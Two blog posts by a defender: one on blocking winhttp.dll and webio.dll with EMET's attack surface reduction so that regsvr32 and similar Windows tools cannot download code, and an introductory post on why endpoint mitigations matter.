Tuesday, September 27, 2016

Should that app use the internet?

One of the inspirations for this blog has been sharing my research in mitigating different types of malware, or activity that can bypass mitigations and perform undesired functions. One thing that really caught my interest is the work that has been published by Casey Smith (@subTee). I found his work on using obscure functions of allowed applications to download code from the internet and execute it particularly interesting. For an example, see http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html.

I decided to take a stab at this. My first attempt was to use a technology I was familiar with to see if I could prevent the applications from using the internet to download code. I knew that the ASR mitigation in EMET could limit access to DLLs for an application, and based off of other ASR work I had done I suspected that a DLL was used in the network transaction at some point so I started pursuing this path. A coworker was able to set up a web server that had a customized version of subTee's regsvr32 download payload. Armed with a working example and Process Monitor with a filter to show DLLs (https://technet.microsoft.com/en-us/sysinternals/processmonitor.aspx) I went to work.

After a little work I was able to narrow down 2 DLLs that I think would work. Previous examples on Twitter targeted the example DLL but were easily bypassed (https://twitter.com/thechrisharrod/status/725713658848882688) because they only blocked one DLL that was not required for the download to execute. After some digging with Process Monitor I found out that the two DLLs that seemed to be the best matches were winhttp.dll and webio.dll. I don't know a whole lot about the DLLs themselves but my theory is that winhttp.dll was used to gather any proxy server settings (learned this from my time spent managing a proxy server) and webio.dll was used when making the actual web calls. If either of these were blocked with ASR I was able to get EMET to prevent regsvr and other applications from using the internet. WinHTTP appeared to have the best logging with the EMET blocks, so I targeted that, and it worked!!!

I began testing the mitigation for a few apps that had documented bypasses that used the internet that I thought had no business using it. After only a few hours of testing I knew that while effective, this was not going to work at scale. Simply put several of these applications were using these DLLs for internal network communications as well as for legit internet activity (who knew rundll32 was used to check OCSP?). My goal was to limit these, but to also grow into things more likely to use the internet like PowerShell, cscript, wscript, and mshtml. I had a tool that was effective, but it wasn't granular enough to allow some approved access and block the rest. It was effective, but only on or off.

So, I was back to the drawing board with a network on/off switch in my back pocket. After a few more weeks of work and thinking I found something that had potential, but I am out of time for now... so I will plan to address that on my next post. Maybe at some point in the future this will come in handy, only time will tell. I will see if I can get a video demonstrating the EMET mitigation posted at some point.

Until then, work hard and spend time with your family.

Branden
@limpidweb

Tuesday, September 13, 2016

Hello World

One of the tasks I get to perform at work is to research and study malware and try to find ways to mitigate it and minimize the damage it can do. I am tasked with assessing our defenses and where necessary providing additional layers for my organization to block malicious activities from occurring on workstations or servers without getting in the way of legitimate work.

I have been in several organizations where pen testers had already demonstrated that they could send attachments or get people to click on links to executable files that would bypass traditional defenses such as IPS, email filtering, URL filtering, sandboxing, and anti-virus. After that they were a command away from downloading .exe, .js, .dll, .reg or a host of other persistence mechanisms and free to do their work through covert C2 channels. Malware that was being blasted to us through spam campaigns or delivered through exploit kits was behaving similarly.

I have worked on traditional defense mechanisms for several years. I have a networking background and have spent a considerable amount of time trying to win this battle from the network infrastructure side, but find myself frequently bumping up against the limitations around trying to write policies that can effectively block this kind of activity. Don't get me wrong, I believe that IPS and firewalls and URL filters and such are an important defense mechanism and can effectively block many of the off-the-shelf attacks. But if something is targeted or just happens to fall within the range of addresses that I had to allow out from my workstations I frequently found myself unable to write a policy that was granular enough to stop it. Firewall/IPS/Proxy vendors have been working to fix this but they haven't cured the problem yet. There is a lot of malicious activity that is simply well behaved at the network layer. On top of that, things like custom encryption, new ciphers, or psychedelic obfuscation was limiting the effectiveness of the policies I did have and even updates several times a day weren't fast enough to keep up with the latest attacks.

Over time I have realized that winning the security battle is going to have to take place in large part on the endpoints. Managing a worm outbreak in my environment exposed me to the power of endpoint enforced policies. For a while only allowing pre-defined applications to run proved to be a big help and I became convinced that this would be one of the most effective ways of preventing this malicious activity. The next big thing for me was anti-exploit, and I dove into tools like Microsoft EMET. These are all still very effective, but the adoption of PowerShell by malicious actors flies right through many of the mitigations I had in place, and folks like Casey Smith are finding all sorts of ways to skirt around the limitations of these technologies.

My purpose with this blog is to explore different mitigations that I find (if any) to address these issues. I like to share my work (where I can) with the intent of helping the blue team and making contributions back to the security industry. Sometimes my thoughts will be partial or a work in progress. Sometimes it will just be lamenting how a mitigation didn't work. Sometimes they will just be about random things that seem cool at the time. Maybe the purpose will grow or change over time. Hopefully I can keep it coherent and the blue team finds it useful.

-Branden
@limpidweb